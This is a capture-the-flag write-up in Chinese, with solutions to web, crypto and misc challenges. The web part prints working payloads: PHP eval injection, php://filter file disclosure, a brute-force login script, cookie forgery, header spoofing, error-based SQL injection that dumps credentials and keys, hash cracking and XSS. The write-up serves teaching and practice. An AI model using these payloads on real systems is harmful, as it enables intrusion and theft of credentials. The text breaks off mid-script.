CTF-60 writeup
Web
Web1 文件包含
打开看到源码
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>
eval() 函数存在命令执行漏洞,构造出文件包含会把字符串参数当做代码来执行。
file() 函数把整个文件读入一个数组中,并将文件作为一个数组返回。
print_r() 函数只用于输出数组。
var_dump() 函数可以输出任何内容:输出变量的容,类型或字符串的内容,类型,长度。
hello=file(“flag.php”),最终会得到var_dump(file(“flag.php”)),以数组形式输出文件内容。
include()函数和php://input,php://filter结合很好用,php://filter可以用与读取文件源代码,结果是源代码base64编码后的结果。
php://filter/convert.base64-encode/resource=文件路径(如index.php)
搜了一下@$_REQUEST 的意思是获得参数,不论是@$_GET还是@$_POST可以得到的参数@$_REQUEST都能得到。
所以构造hello的get参数。
$a应该最后会像字符串替换一样替换成hello的参数值吧。
payload:
<1> hello=);print_r(file("flag.php")
<2> hello=);var_dump(file("flag.php")
<3> hello=file("flag.php")
<4> hello=);include(@$_POST['b']
在POST区域:b=php://filter/convert.base64-encode/resource=flag.php
<5> hello=);include("php://filter/convert.base64-encode/resource=flag.php"
<6> hello=1);show_source('flag.php');var_dump(
flag{ccd234c9-c022-4ce3-8a62-e56374e3324f}
Web2 爆破
提示5位数字密码
用bs抓包爆破
可以用Burp爆破
或者用python3的脚本
import requests
import threading
psw = 0
lock = threading.RLock()
gotit = False
correct = ""
class BreakThread(threading.Thread):
def run(self):
global psw, gotit, correct
while True:
lock.acquire()
if psw > 99999 or gotit:
lock.release()
break
d = {
"pwd": str(psw).zfill(5)
}
psw = psw + 1
lock.release()
r = requests.post("http://xxxxx/baopo/?yes", data=d)
r.encoding = "utf-8"
try:
r.text.index("密码不正确")
except ValueError:
print(d["pwd"] + " right")
gotit = True
lock.acquire()
correct = d["pwd"]
lock.release()
break
else:
print(d["pwd"] + " wrong")
l = []
for i in range(2):
l.append(BreakThread())
for i in l:
i.start()
for i in l:
i.join()
print("正确密码:"+correct)
得出:
flag{bugku-baopo-hah}
Web3 变量1
打开看到源码
flag In the variable ! <?php
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
$args = $_GET['args'];
if(!preg_match("/^\w+$/",$args)){
die("args error!");
}
eval("var_dump($$args);");
}
?>
又是代码审计...
首先简单看了一下 没有发现什么有用的信息,之后注意到最后一行的eval("var_dump($ $args);"); 注意了这地方有两个$ $
看到这里大家应该就懂了 所以我们只需给变量传一个全局数组变量就好了 所以我们构造 ?args=GLOBALS加到网页后面
http://192.168.1.101:1022?args=GLOBALS
便可得到FLAG
array(7) { ["GLOBALS"]=> *RECURSION* ["_POST"]=> array(0) { } ["_GET"]=> array(1) { ["args"]=> string(7) "GLOBALS" } ["_COOKIE"]=> array(0) { } ["_FILES"]=> array(0) { } ["ZFkwe3"]=> string(38) "flag{92853051ab894a64f7865cf3c2128b34}" ["args"]=> string(7) "GLOBALS" }
flag{92853051ab894a64f7865cf3c2128b34}
Web4 filter漏洞
php://filter
解释:php://filter是一种元封装器,设计用于"数据流打开"时的"筛选过滤"应用,对本地磁盘文件进行读写。简单来讲就是可以在执行代码前将代码换个方式读取出来,只是读取,不需要开启allow_url_include;
用法:?file=php://filter/convert.base64-encode/resource=xxx.php
?file=php://filter/read=convert.base64-encode/resource=xxx.php 一样
基本上原理就是利用php://filter在执行index.php之前将其内容用base64编码,这样就掩盖了<?php,导致无法执行直接输出,输出的是base64编码之后的内容,再解一下码就可以了
payload:?file=php://filter/read=convert.base64-encode/resource=./index.php
构造
http://192.168.1.101:1023/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
base64转码后
<html>
<title>asdf</title>
<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag{edulcni_elif_lacol_si_siht}
?>
</html>
flag{edulcni_elif_lacol_si_siht}
Web5 get方法
构造
http://192.168.1.101:1024/?what=flag
$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';
flagflag{bugku_get_su8kej2en}
flag{bugku_get_su8kej2en}
Web6 post方法
构造http://192.168.1.101:1025
post提交what=flag
$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';
flagflag{bugku_get_ssseint67se}
flag{bugku_get_ssseint67se}
Web7 jsfuck编码
ctrl+u查看源码,复制出加密字符串,输入f12控制台回车
ctf{whatfk}
Web8 is_numeric
即num既不能是数字字符,但是要等于1
我们可以想到用科学计数法表示数字1,既不是纯数字,其值又等于1
因此,构造payload
num=1a
可以得到flag
http://192.168.1.101:1027/?num=1a
$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}
1aflag{bugku-789-ps-ssdf}
flag{bugku-789-ps-ssdf}
Web9 html实体编码
查看源码
<!--KEY{J2sa42ahJK-HS11III}-->
去掉注释符保存为1.html文件,浏览器打开即可转码
KEY{J2sa42ahJK-HS11III}
Web10 url编码
查看源码url编码解码
在这里我们发现了有个js它定义了两个变量并采用eval函数算一些什么东西
不过很明显两个变量都是url编码 我们解密下可以得到
p1=function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2b
p2=aa648cf6e87a7114f1"==a.value)return!0;alert("Error");a.focus();return!1}}document.getElementById("levelQuest").οnsubmit=checkSubmit;
然后我们分析
eval(unescape(p1) + unescape('%35%34%61%61%32' + p2));
里面还有一段url编码 老规矩解密下得到54aa2
于是我们把三次的结果拼装起来得到p1=function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value)return!0;alert("Error");a.focus();return!1}}document.getElementById("levelQuest").οnsubmit=checkSubmit;
然后便得到值67d709b2b54aa2aa648cf6e87a7114f1放入输入框即可获得flag
KEY{J22JK-HS11}
Web11 修改静态html
直接输入发现只能输入一位数
审查元素让maxlength = 2就好了
flag{CTF-bugku-0032}
Web12 页面快速刷新
右键查看源代码 然后一直刷新 直到出来flag
也可以用burp抓包
repeat一直发送
随机出现当出现10.jpg时有flag
<img src="10.jpg"/></div></center><br><a style="display:none">flag{dummy_game_1s_s0_popular}</a></body>
</html>
flag{dummy_game_1s_s0_popular}
Web13 index备份+php弱类型
页面一串代码没用
用御剑扫描出
http://192.168.1.101:1032/index.php.bak
下载打开
<?php
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);
echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag";
}
?>
审计php弱类型,key被过滤双写绕过,构造
http://192.168.1.101:1032/index.php?kekeyy1=240610708&kekeyy2=QNKCDZO
得flag
Bugku{OH_YOU_FIND_MY_MOMY}
Web14 X-Forwarded-For
如果我们在登录系统中输入用户名和密码,则会出现以下错误,表明IP无效:
Mismatch in host table! Please contact your administrator for access. IP logged.
我们直接使用火狐插件或者burp修改
X-Forwarded-For: 127.0.0.1
修改完后登陆发现不报ip错误了 密码错误
然后查看网站源代码发现一段base64 dGVzdDEyMw==
解密后test123
admin test123 登陆获取flag
flag{85ff2ee4171396724bae20c0bd851f6b}
Web15 cookie伪造
这个题目是一个cookie题
我们注册一个用户登陆上
Cookie都是351e766803开头
我们猜把351e766803后面的值改成admin的md5值
351e766803 21232f297a57a5a743894a0e4a801fc3
修改完cookie
bs抓包改,发送
Cookie: session=6c1752d5-ddbf-4d04-9f2a-2c9de2b795bf; PHPSESSID=ubcb0jjgv6m6nrvs38re4jjji1; u=351e76680321232f297a57a5a743894a0e4a801fc3; r=351e76680321232f297a57a5a743894a0e4a801fc3
得到flag<h1>Welcome admin user!</h1><h3>The flag is: 98112cb20fb17cc81687115010f8a5c3</h3></body>
flag{98112cb20fb17cc81687115010f8a5c3}
Web16 秋名山车神 python快速提交
# -*- coding:utf-8 -*-
import re
import requests
s = requests.Session()
r = s.get("http://192.168.1.101:1035/")
#print r.content
searchObj = re.search(r'^<div>(.*)=\?;</div>$', r.text, re.M | re.S)
d = {
"value": eval(searchObj.group(1))
}
r = s.post("http://192.168.1.101:1035/", data=d)
print(r.text)
得到flag
Bugku{YOU_DID_IT_BY_SECOND}
Web17 WEB400 登录密码破解BCrypt加密
分析
挑战提供登录表单并告诉我们登录后我们将获得该标志。并且没有更多
在查看网络源代码时,我们发现了一条好奇的HTML评论:
<!-- The partial password is: kztu6fe1m68mwf7vl1g3grjzmocia043pmno83q3ati98c8r324dzc0hc7n41p6tdjg6p -->
<!-- sql file exported and backed up -->
这表明隐藏了数据库的备份。在询问了一些像db.sql或backup.sql这样的文件后,我们找到了正确的文件:database.sql
curl http://192.168.1.101:1036/database.sql
备份的内容是:
---- Dumping data for table `users`--INSERT INTO `users` (`id`, `username`, `password_bcrypt`, `fname`, `description`) VALUES (1, 'harry', '$2y$10$FalJ8SmqTDBv7Fr366RC9uW5hKJVZijsDqzgASh1kSGMsUFMMLGZq', 'hackim', 'Hash cracking is futile!');
我们观察表中的单个记录users。harry用户的密码用BCrypt 进行哈希处理。我们必须破解它,为此我们再次值得我们在开始时发现的HTML注释。
<!-- The partial password is: kztu6fe1m68mwf7vl1g3grjzmocia043pmno83q3ati98c8r324dzc0hc7n41p6tdjg6p -->
他们给我们一部分密码,显然我们不会在任何在线数据库或字典中找到它。我们必须使用部分密码作为前缀和/或后缀来创建我们自己的字典。为此我们编写一个简单的Python脚本:
v = "0123456789abcdefghijklmnopqrstuvwxyz"p = "kztu6fe1m68mwf7vl1g3grjzmocia043pmno83q3ati98c8r324dzc0hc7n41p6tdjg6p"def imprimir(n, s):
for c in v:
print s + c
print c + s
if n > 0:
imprimir(n - 1, s + c)
imprimir(n - 1, c + s)imprimir(2, p)
该脚本认为字符集与部分键(小写字母和数字)的字符集相同。我们这样执行:
python gen.py > dict.txt
然后我们使用John The Ripper来破解哈希:
echo '$2y$10$FalJ8SmqTDBv7Fr366RC9uW5hKJVZijsDqzgASh1kSGMsUFMMLGZq' > hash.txt
john --fork=8 --wordlist=dict.txt --format=bcrypt hash.txt
几分钟后睡了一会儿......
john --show hash.txt
?:kztu6fe1m68mwf7vl1g3grjzmocia043pmno83q3ati98c8r324dzc0hc7n41p6tdjg6p7ld
密码是kztu6fe1m68mwf7vl1g3grjzmocia043pmno83q3ati98c8r324dzc0hc7n41p6tdjg6p7ld
登录网站显示flag是:
flag{b7ebfe2a47f711a7b2b5bff057600a2c}
Web18 综合注入
我们使用基于错误的技术利用SQL注入,即我们在数据库生成的错误消息中提取的信息。例如,要获取数据库的名称,我们进行以下注入:
User-Agent: xxx' and extractvalue(0x0a, concat(0x0a, database()))=0 -- x
该数据库的名称是:hackimweb500
现在我们列出所述数据库的表:
User-Agent: xxx' and extractvalue(0x0a, concat(0x0a,(select group_concat(table_name) from information_schema.tables where table_schema='hackimweb500')))=0 -- x
我们得到:
<br /><p style='color:red'>Invalid credentials</p> <h3>XPATH syntax error: '
accounts,cryptokey,useragents'
我们从accounts表中提取列:
User-Agent: xxx' and extractvalue(0x0a, concat(0x0a,(select group_concat(column_name) from information_schema.columns where table_schema='hackimweb500' and table_name='accounts')))=0 -- x
<br /><p style='color:red'>Invalid credentials</p> <h3>XPATH syntax error: '
uid,uname,pwd,age,zipcode'
我们对其他表的运作方式相似。最后我们有数据库的结构:
hackimweb500:
- accounts (uid,uname,pwd,age,zipcode)
- cryptokey (id,keyval,keyfor)
- useragents (bid,agent)
我们从帐户表中提取记录:
User-Agent: xxx' and extractvalue(0x0a, concat(0x0a,(select group_concat(concat(uname,':',pwd)) from accounts)))=0 -- x
<br /><p style='color:red'>Invalid credentials</p> <h3>XPATH syntax error: '
ori:6606a19f6345f8d6e998b69778c'
但是,密码的哈希值已被截断。没问题,我们用MID功能来解决它。
User-Agent: xxx' and extractvalue(0x0a, concat(0x0a,(select mid(pwd,20,20) from accounts)))=0 -- x
<br /><p style='color:red'>Invalid credentials</p> <h3>XPATH syntax error: '
8b69778cbf7ed'
整个哈希是6606a19f6345f8d6e998b69778cbf7ed。在Google搜索之后,我们发现密码是frettchen。
我们启动与用户ori和frettchen密钥的会话......并将我们重定向到一个有点好奇的URL,显然是挑战的第二部分。
http://54.152.19.210/web500/ba3988db0a3167093b1f74e8ae4a8e83.php?file=uWN9aYRF42LJbElOcrtjrFL6omjCL4AnkcmSuszI7aA=
URL接收file带有base64文本的参数,如果我们解码,我们就不会得到任何可读的内容。该页面还告诉我们该标志位于flagflagflagflag.txt文件中。
当我们查看页面的源代码时,我们会以HTML注释的形式找到另一个提示:
<!--
function decrypt($enc){
$key = ??; //stored elsewhere
$data = base64_decode($enc);
$iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
$decrypted = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128,hash('sha256', $key, true),substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),MCRYPT_MODE_CBC,$iv),"\0");
return $decrypted;
}
-->
它似乎是file决定URL 参数的函数。但是,$key未分配变量。解密的关键在于其他地方。
我们记得数据库中的cryptokey表,我们将其转储:
User-Agent: xxx' and extractvalue(0x0a, concat(0x0a,(select keyval from cryptokey)))=0 -- x
<br /><p style='color:red'>Invalid credentials</p> <h3>XPATH syntax error: '
TheTormentofTantalus'
关键是TheTormentofTantalus。我们decrypt使用加密密钥完成该功能,并尝试解密参数的值file。
<?phpfunction decrypt($enc){$key = "TheTormentofTantalus"; //stored elsewhere$data = base64_decode($enc);$iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));$decrypted = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128,hash('sha256', $key, true),substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),MCRYPT_MODE_CBC,$iv),"\0");return $decrypted;}echo decrypt("uWN9aYRF42LJbElOcrtjrFL6omjCL4AnkcmSuszI7aA=") . "\n";
我们执行PHP代码:
php decifra.php
flag-hint
一个给定的结果。该文件的名称是flag-hint。但我们需要flagflagflagflag.txt文件。我们编写一个使用相同算法和密钥加密的函数。
<?phpfunction encrypt($data) {
$key = "TheTormentofTantalus"; //stored elsewhere $iv = "\xb9c}i\x84E\xe3b\xc9lINr\xbbc\xac";
// $iv = str_repeat("A", mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)); $enc = mcrypt_encrypt (
MCRYPT_RIJNDAEL_128,
hash('sha256', $key, true),
$data,
MCRYPT_MODE_CBC,
$iv
);
return base64_encode($iv . $enc);}echo encrypt("flagflagflagflag") . "\n";
经过一段时间的挫折之后,我们明白我们应该只加密文件名而不加密它的扩展名。
php cifrar.php
uWN9aYRF42LJbElOcrtjrBBiPlzTw8YXwRyfAyqcsVM=
最后我们调用URL file使用获得的值更改参数并且...
http://54.152.19.210/web500/ba3988db0a3167093b1f74e8ae4a8e83.php?file=uWN9aYRF42LJbElOcrtjrBBiPlzTw8YXwRyfAyqcsVM=
Flag:{70031737753d9e53970531fc9475d6ef}
Web19 XSS
flag{M3_w@n7_c0ok1e_m3_5teal_co0ki3}
Web20 XSS1
<?php
// by harry
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>
代码直接引用了name参数,并没有任何的过滤与检查,存在明显的XSS漏洞。输入<script>alert(/flag/)</script>,成功弹框,页面显示
Hello
Crypto
Crypto1 栅栏密码
fa{660cb679d7866ffalg7d27e041cfbd18ed}
栅栏密码用密码机器解密
flag{76d6207ceb064719cdf7b8d6168fefda}
Crypto2 摩斯密码
..-./.-../.-/--./----.--/./...../----././----./----./.-/----./-----/-.../...../-.-././..-./-..../..-./-----.-
摩斯密码用机器解密解密
flag{e59e99a90b5cef6f}
Crypto3 base64三重加密
密文bE0veldtTDs7NzlTe3hzbSFYSj5Sa2U6eyQ4NyVrI3FvWFU6Qls7QlVK 密钥589164
字符串不难看出是base64
解出来的结果是
lM/zWmL;;79S{xsm!XJ>Rke:{$87%k#qoXU:B[;BUJ
这个看起来有点乱,不知道是什么,不过想想提示,589164,什么意思,前面是base64,那整句就是base58 base91 base64
解base91得出结果
iDMb6ZMTGMptmkhxw36mqkjCkyUHL3sSp4
再解base58得到flag
flag{JustUse3TimesEncode}
Crypto4 Ook
Ook!加密
在线解密网站https://www.splitbrain.org/services/ook
或者本地搭建的解密网站http://127.0.0.1/ook-master/
flag{1c470f09af4c86b7}
Crypto5 bbrainfuck
Brainfuck加密
在线解密网站https://www.splitbrain.org/services/ook
或者本地搭建的解密网站http://127.0.0.1/ook-master/
flag{8321df7c190317ec}
Crypto6 密码学-rsass
下载压缩包,得到rsa.zip,解压,发现有密码,使用弱口令爆破,密码是password
发现里面有
根据做了那么多rsa的经验来说,两个公钥第一反应是共模攻击.
先使用openssl取出两个pubkey的n和e,(也可以使用在线工具取出n和e)http://ctf.ssleye.com/pub_asys.html
n1=n2
e1=2333=e2=23333
提取后发现两个公钥的n都是一样的,只有e不一样,就更加确定是共模攻击了.
接下来就是取出密文.
打开密文发现是这样的。
需要先将其base64解码,再转为10进制,才能得到密文m,可使用在线工具是解不开这个base64的。
这里我们使用Python.
先base64解码(这里如果不放到变量里面下一步会报错.):
导入一个libnum库,将hex转为dec:
得到了两个密文:
M1 =
M2 =
完整的取出m的代码
现在已经得到了n, e1, e2, m1, m2 可以开始写共模攻击脚本了。(脚本已打包,gm.py )
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author : HeliantHuS
# Time : 2018/12/10
from gmpy2 import invert
def gongmogongji(n, c1, c2, e1, e2):
def egcd(a, b):
if b == 0:
return a, 0
else:
x, y = egcd(b, a % b)
return y, x - (a // b) * y
s = egcd(e1, e2)
s1 = s[0]
s2 = s[1]
if s1 < 0:
s1 = - s1
c1 = invert(c1, n)
elif s2 < 0:
s2 = - s2
c2 = invert(c2, n)
m = pow(c1, s1, n) * pow(c2, s2, n) % n
return m
n = 17362520124149736059291605717839814089431261833972408175766504894876091272021197374480215582589878198406028065354454242540322618614670160317701698407729515781811530180885334265851364490357884909336085410775168953942120359215038925025305363480538685487988827339463890539279008285241711326041868183805848503077373967082910932422798165242481154593794712639251157856102009630894845049984346776659339380886766804814959778048440996937820138560802077375885700500737699904011032451007341777160586467318264288370080315519305800247682611802774996999330812534723806925426052547128371180683265963525581842037399869323246530085399
e1 = 2333
e2 = 23333
c1 = 11757177168629974661319129065020939259607843855964612407515015619551332717303594939284265148421101106538576564879770344246694669035164564635188309876801896156214909946098869029964618647606449218025915092461416329529723153695631060387903820322776063152970417682658882514448192870115306139048632667164375339647480060498038060662339943872320998391726896418231367745182167642401094985859083528539732718585607300300744481583877075988159078923393794888199752412273065186387778708588318818871255432956112609603017152148063465689319082652284861285738454428311471661017770501362483439955249552527930663707069794266908382237863
c2 = 2364848878397323871885597084235162950454738150033561990125608234733186785294327511676322556989693319543787881108157790541032502889824032246849038028277601291878651138223131738210948288040172974610279550123399373111991951111719314902078119305973622147396199257818150347936553495169543808071509800280778646769553776723985138633331947024508645378935223338224527962766707863670722941767067705851822587652625805245801727869961524972624327839027498877534264770109063202217409037083612774983213841234965045214820133529399280883524064963136158251681946077429913578531311243649928666453318570284124743168193304356485791847813
result = gongmogongji(n, c1, c2, e1, e2)
print result
得到了:
56006392793405146392044030904223674296981372972935018576761589590002462312910860136112925465677030781
先将这个十进制数字转为hex:
得到:
666c61677b34623062346338612d383266332d346438302d393032622d3865376135373036663866657d
再将其转为字符:
得到flag:
flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe}
平台不让用 - , 就更改一下flag格式(删除-).
python脚本:
# -*- coding:utf-8 -*-
# 十进制转换为十六进制转换为字符串
a = "56006392793405146392044030904223674296981372972935018576761589590002462312910860136112925465677030781"
b = hex(int(a)) #转换为16进制
#print b
flag = ""
for i in range(2,len(b)-1,2):
flag += chr(int(b[i:i+2],16)) #转换为字符串
print flag.replace("-","") #替换字符串的-
得到最终的flag:
flag{4b0b4c8a82f34d80902b8e7a5706f8fe}
Crypto7 看键盘看键盘看键盘!
ujn njkm ijnmhjk fgtrdcv tgvgy njkm hjuygbn ijnmhjk
提交:ctf{}
按字母键盘画出字符为Internet
ctf{Internet}
Crypto8 火眼金睛
下载Crack.zip,先暴力破解5位数字密码,得到两个文件readm.txt,flag.zip,
再用 readme.txt明文攻击破解出flag.zip密码,得到flag.png
用010改高度,得到flag
flag{40328fb5149e493d}
Crypto9 rsa-encrypted
用Kali安装gmpy2
需要的依赖库 gmp mpfr mpc
gmp 库安装
apt-get install libgmp-dev
mpfr 库安装
apt-get install libmpfr-dev
mpc 库安装
apt-get install libmpc-dev
pip安装
apt-get install python3-pip
gmpy安装
pip install gmpy2
运行python
>>> c=4153372421328787064168548641845708183921443446990158572506114559735441950501706984118235944441928889749083563790293558028143373121367441549974248211570336802004821051820943229232421937298269855190652251294220483768084460779714162849925877879859830009443131489814222929347727735616113359695228615432020363240247474622132986939108457393618346100033147945959684443762976681454755482192433993286205527003029269574787026484389622816932835184754540312561890719407986296481186847292967270288752616
>>> gmpy2.iroot(c,3)
(mpz(16074357572745018593418837326290993512421736655307780242162599660198598253230550168811761868953242350136362894008095983571749530656901163555918436741973772511575306L), True)
>>> x=16074357572745018593418837326290993512421736655307780242162599660198598253230550168811761868953242350136362894008095983571749530656901163555918436741973772511575306
>>> x=libnum.n2s(16074357572745018593418837326290993512421736655307780242162599660198598253230550168811761868953242350136362894008095983571749530656901163555918436741973772511575306)
>>> x1=x[::-1].encode('rot13')
>>> x1
'This is the password you need for the ZIP file: flag{rsaM0reD33peR}\n'
flag{rsaM0reD33peR}
Crypto10 easy_crypto
摩斯密码解密0 1 和空格
flag{m0rse_code_1s_interest1n9!}
Crypto11 CRC32 BOOM!
github上下载crc32.py爆破攻击
rar打开压缩包看crc32值
python运行
python crc32.py reverse 0x8e234ae0
看到疑似密码alternative: bugku_ (OK)
python crc32.py reverse 0x8115a277
看到疑似密码alternative: newctf (OK)
拼到一起bugku_newctf
用010editor打开flag.jpg看到flag
flag{Crcrcrcrc_32_BOOM}
Crypto12 置换密码
用密码机器网页版解密置换密码
lfe{agdf7244bb47cd310b7b1d71e01c9e6d}c@@@@
排列 216534
解密后
flag{efd4427bbcd74137bb0d1e017c16de9c}
Crypto13 维吉尼亚密码
用密码机器网页版解密维吉尼亚密码
gndk{911k46l0jln5804oo592mo9q363st1r1}
默认密钥bcdefghijklmnopqrstuvwxyza
解密后
flag{911f46f0cde5804ed592ab9c363dd1a1}
Crypto15 古典密码_crypto_infosec
题目:古典密码
Lrg|{R6{{QQ%O@pOjkiuP*YDuL_tzgNkvpePEu2SNlsKp
提交格式CTF{}
copytright@infosec
第一个base85解密,出来CLF{TCAASISCLWASPSOEDARRIETENRS}INTG
古典密码解密,分成6个一组,b=[0,4,2,3,5,1]按照这样的顺序
·解出密码CTF{CLASSICALPASSWORDAREINTERESTING}
脚本解密
Import base64
demo = base64.b85decode('Lrg|{R6{{QQ%O@pOjkiuP*YDuL_tzgNkvpePEu2SNlsKp').decode('utf8')
print(demo)
b = [0,4,2,3,5,1]
for i in range(0,len(demo),6):
for j in b:
print(demo[i+j],end='')
解出flag:
CTF{CLASSICALPASSWORDAREINTERESTING}
Crypto16 进制转换
题目:1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1303 1211 301 302 303 1331
这个看起来就是4进制,于是打开网站http://tool.oschina.net/hexconvert/:
4进制转换为16进制
最后得到16进制
66 6C 61 67 7B 46 6F 75 72 62 61 73 65 31 32 33 7D
直接converter转换成文本得到
flag{Fourbase123}
Crypto17 简单异或
AnHZniLvmOHW1YJe5Sgdqgl:Ny0cHQcMBBcYOAQzVW5+VHwJClEzHlQ=
LiuBZYGvFfCi6HKmFkR"LZD:OiohBTM8DxczEQ8NUn9/XA8xPxcOI3w=
4kCKeIb3svqiOAjQZUaUNBQ:QigXDAwsKlIGAT0NK3ZeYBMPDGAMO2k=
here is the encrypt flag:
EC81IBIrJxYqLiMRO3xaXj4FNXoQWEU=
import base64
def xor(a,b):
res = ""
assert len(a) == len(b)
for i in range(len(a)):
res += chr(ord(a[i])^ord(b[i]))
return res
f = open("give_to_player","r")
f.readline()
info = f.readline().strip("\n")
dec = info.split(":")[0]
enc = info.split(":")[1]
key = xor(dec,base64.b64decode(enc))
f.readline()
f.readline()
flag = f.readline().strip("\n")
flag = xor(key,base64.b64decode(flag))
print(flag)
Misc
1 Traffic_Light
打开发现是一个红绿灯的gif图片
看到红绿灯的闪烁 让我们联想到了二进制的0和1,其中绿灯代表0,红灯代表1;
用Gifsplitter.exe分离工具,把gif分离下来
发现每八个红绿灯闪烁之后就会有一个黄灯作为间隔,这也证实了我的猜想
于是就有了思路,首先把红灯、绿灯、黄灯的图片用二进制读取出来,并存在一个列表里面,然后把其他图片也用二进制读取,和列表进行比对。 如果是红灯返回1,绿灯返回0,黄灯就表示换行。
puthon脚本如下 :
解析图片代表的二进制数字:
# -*- coding:utf-8 -*-
f = open("./Traffic_Light/IMG00000.bmp","rb") #0
data = f.read()
f1 = open("./Traffic_Light/IMG00002.bmp","rb") #1
data1 = f1.read()
f2 = open("./Traffic_Light/IMG00016.bmp","rb") #分隔符号
data2 = f2.read()
a = data.encode('hex')
b = data1.encode('hex')
c = data2.encode('hex')
list=[a,b,c]
flag = ""
for i in range(9):
i=i+1
tupian = "./Traffic_Light/IMG0000"+str(i)+".bmp"
f = open(tupian,"rb")
data = f.read()
d = data.encode('hex')
if d in list:
number = list.index(d)
flag+=str(number)
print flag
for i in range(10,100):
tupian = "./Traffic_Light/IMG000"+str(i)+".bmp"
f = open(tupian,"rb")
data = f.read()
d = data.encode('hex')
if d in list:
number = list.index(d)
flag+=str(number)
print flag
for i in range(100,1000):
tupian = "./Traffic_Light/IMG00"+str(i)+".bmp"
f = open(tupian,"rb")
data = f.read()
d = data.encode('hex')
if d in list:
number = list.index(d)
flag+=str(number)
print flag
for i in range(1000,1168):
tupian = "./Traffic_Light/IMG0"+str(i)+".bmp"
f = open(tupian,"rb")
data = f.read()
d = data.encode('hex')
if d in list:
number = list.index(d)
flag+=str(number)
print flag
fn=flag.replace('2','\n')
s=open('./flag.txt','a+')
s=s.write(fn)
file=open("./flag.txt","r")
flag = ""
while 1:
line = file.readline()
if not line:
break
else:
a = chr(int(line,2))
flag = flag + str(a)
print flag
print flag
打印出flag:
flag{Pl34s3_p4y_4tt3nt10n_t0_tr4ff1c_s4f3ty_wh3n_y0u_4r3_0uts1d3}
misc2 bmp缺少文件头
题目是一张bmp的图片,但是并不能够打开,用010editor打开看看
熟悉bmp文件头的应该很快就能够发现,这里少了文件头,但是并不是随便加个文件头就可以了的,因为不是所有的bmp文件头数据都是一样的,所以需要知道文件的大小,宽高才能够匹配正确的文件头!(具体百度)
winhex中能够看到文件大小为`202800byte`
* 由于已经少了文件头,所以图像的大小就是202800
- 那么宽高是是多少呢?
- 这里得看位图是多少,现在常见的就是24位,每三个字节存储一个像素
- 图片的名称也能够得到提示
- 图像大小=宽 x 高 x 3
得到宽乘高就是67600=260*260
画图新建260*260得文件保存为24位的bmp文件,然后用010editor把文件头复制过去保存打开后:
flag{2bbec037bca695ab4059afb8623ee041}
misc3 Welcome 图片隐写
首先直接点开是一张图:
常规方法,用记事本打开,发现没啥用,然后改后缀,改成rar或者zip之后,打开:
看到flag.rar是加密过的,同时给出了提示:
脑洞大一点想想,可以发现这就是扑克牌里的 K Q J,又因为是3个数字,键盘密码,871
或者爆破出密码
输入密码871,解压出图,用记事本打开它,可以看到:
f1@g{eTB1IEFyZSBhIGhAY2tlciE=}
Base64之后得到
flag{y0u Are a h@cker!}
misc4 哆啦A梦.jpg 图片隐写
拿到题目,提示说图片少了点什么?
然后放linux下,使用binwalk查看
发现图片下面隐藏了一张PNG图片
导出图片
在linux下不能正常查看此图片,但在windows下可以查看,说明图片有问题,被修改了头,而且在windows下查看是个二维码,但是明显不全
可以认定是修改了图片的高,有一部分没显示出来。
使用十六进制编辑器,修改文件的头
目前图片的宽高为300x257,257对应的十六进制为101,在十六进制编辑器中搜索0101
将0101修改为300对应的十六进制012c即可
成功查看二维码,扫描出一个base64的结果
flag{Ctf_2018_very_good}
misc5 string搜索
解题思路:
打开之后发现有500个txt文件,每个都是8K
开始思路被僵化,以为要把这所有的文件合成一个文件,然后通过winhex查看文件头也没什么收获
最后猛然发现,使用strings命令有奇效
strings *|grep key{
key{fe9ff627da72364a}
misc6 多文件转换二进制 二进制转字符串
我们打开题目,发现除了rar还有一个压缩包密码.txt,打开之后发现是base64,但是使用converter转换失败,我们认为这串base64应该可以转换成图片,看开头就知道了。
于是利用在线网站转换,http://tool.chinaz.com/tools/imgtobase 或者直接复制到浏览器地址栏打开
可以看到转换为了图片,上面显示密码为asdfghjkl。我们解开压缩包可以看到里面有一百多个二维码,估计信息就藏在二维码上。
编写如下脚本:
# -*- coding:utf-8 -*-
#读取文件
f0 = open("./wenjian/0.png","rb") #0
data0 = f0.read()
f1 = open("./wenjian/1.png","rb") #1
data1 = f1.read()
#判断文件写入二进制
a0 = data0.encode('hex')
b1 = data1.encode('hex')
list=[a0,b1]
flagbin = ""
for i in range(0,160):
tupian = "./wenjian/"+str(i)+".png"
f = open(tupian,"rb")
data = f.read()
d = data.encode('hex')
if d in list:
number = list.index(d)
flagbin+=str(number)
#print flagbin
# 二进制转换为字符串
